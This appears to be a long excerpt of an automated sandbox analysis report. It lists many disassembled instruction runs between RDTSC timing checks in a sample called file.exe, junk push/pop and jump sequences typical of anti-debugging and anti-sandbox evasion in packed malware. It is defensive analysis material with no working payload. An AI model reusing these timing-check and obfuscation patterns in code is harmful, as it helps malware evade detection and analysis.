Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FA2C second address: A5FA30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FA30 second address: A5FA52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E97h 0x00000007 pushad 0x00000008 jg 00007F661CE75E86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5FB71 second address: A5FB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 jbe 00007F661D451436h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62F66 second address: A62F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69191 second address: A691A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A67EFB second address: A67F57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E96h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 je 00007F661CE75EA5h 0x00000017 jmp 00007F661CE75E99h 0x0000001c je 00007F661CE75E86h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F661CE75E93h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D68F second address: A6D693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D693 second address: A6D699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6D699 second address: A6D6B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451445h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DDB4 second address: A6DDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DDBA second address: A6DDC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6DDC3 second address: A6DDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E1D2 second address: A6E1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E307 second address: A6E30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76DF5 second address: A76E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 jo 00007F661D451436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F661D451448h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76E28 second address: A76E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76E2E second address: A76E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76E32 second address: A76E43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F661CE75E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75C7D second address: A75C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75C89 second address: A75CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E93h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F661CE75E8Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31683 second address: A31687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31687 second address: A3168C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A318C1 second address: A318C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31CC9 second address: A31CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31EC7 second address: A31EF2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D451438h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jnc 00007F661D451440h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 push ecx 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31FDA second address: A31FED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A31FED second address: A32007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32007 second address: A3200C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76102 second address: A76124 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F661D451436h 0x00000008 jnl 00007F661D451436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F661D45143Eh 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76124 second address: A7612C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7612C second address: A7614D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D451444h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7614D second address: A76151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76151 second address: A76180 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F661D451436h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F661D45144Eh 0x00000012 jmp 00007F661D451448h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76434 second address: A76454 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F661CE75E92h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F661CE75E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76454 second address: A7646E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F661D451442h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76838 second address: A76840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76840 second address: A76846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76984 second address: A76993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F661CE75E86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76993 second address: A7699D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7699D second address: A769A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A769A1 second address: A769A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F77A7 second address: 9F77B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F661CE75E88h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F77B5 second address: 9F77E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F661D45143Fh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push ecx 0x0000000c ja 00007F661D451436h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F661D45143Ah 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F77E7 second address: 9F77EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BD3D second address: A7BD77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F661D451438h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 jnl 00007F661D451436h 0x00000018 jc 00007F661D451436h 0x0000001e pop ebx 0x0000001f ja 00007F661D451442h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BD77 second address: A7BD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FA56 second address: A7FA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A80FA1 second address: A80FAB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85B77 second address: A85B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8541C second address: A85430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Eh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85430 second address: A85445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89E9F second address: A89EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F661CE75E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89EA9 second address: A89EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89EAD second address: A89EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jc 00007F661CE75E86h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89EC0 second address: A89ECA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32353 second address: A32358 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A5EA second address: A8A5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A7A3 second address: A8A7C7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F661CE75E92h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A7C7 second address: A8A7D7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F661D451436h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A7D7 second address: A8A7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8DB10 second address: A8DB14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8DB14 second address: A8DB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F661CE75E8Eh 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8DC8A second address: A8DCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D451447h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F661D451442h 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8DCBD second address: A8DCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F661CE75E86h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8DE36 second address: A8DE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8DE3B second address: A8DE46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F661CE75E86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E1A4 second address: A8E1AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F661D451436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A95B77 second address: A95B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 jc 00007F661CE75E86h 0x0000000e jo 00007F661CE75E86h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A95B90 second address: A95BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D451442h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A93AF3 second address: A93AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A93AF7 second address: A93B26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F661D451446h 0x00000011 jmp 00007F661D45143Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A93B26 second address: A93B30 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A93B30 second address: A93B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A93B35 second address: A93B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F661CE75E97h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F661CE75E9Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F661CE75E8Dh 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A93D01 second address: A93D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A93D05 second address: A93D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F661CE75E86h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94053 second address: A94057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94057 second address: A9405D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9405D second address: A94067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F661D451436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9433D second address: A94341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94F6A second address: A94F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94F70 second address: A94F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A955C7 second address: A955F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F661D451447h 0x0000000c popad 0x0000000d pop ecx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F661D451436h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A95894 second address: A958AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ah 0x00000007 js 00007F661CE75E86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A958AC second address: A958B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EF456 second address: 9EF45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9DE99 second address: A9DEA3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F661D451436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E023 second address: A9E029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E029 second address: A9E02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E02D second address: A9E035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E035 second address: A9E03F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F661D45143Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E03F second address: A9E069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F661CE75E8Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jmp 00007F661CE75E92h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E069 second address: A9E06E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E06E second address: A9E074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E1CF second address: A9E1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E1D5 second address: A9E1F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F661CE75E92h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E3A2 second address: A9E3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E3A7 second address: A9E3B1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F661CE75E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6226 second address: AA622A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA622A second address: AA6230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA637C second address: AA6383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6630 second address: AA6636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAECF6 second address: AAED01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F661D451436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
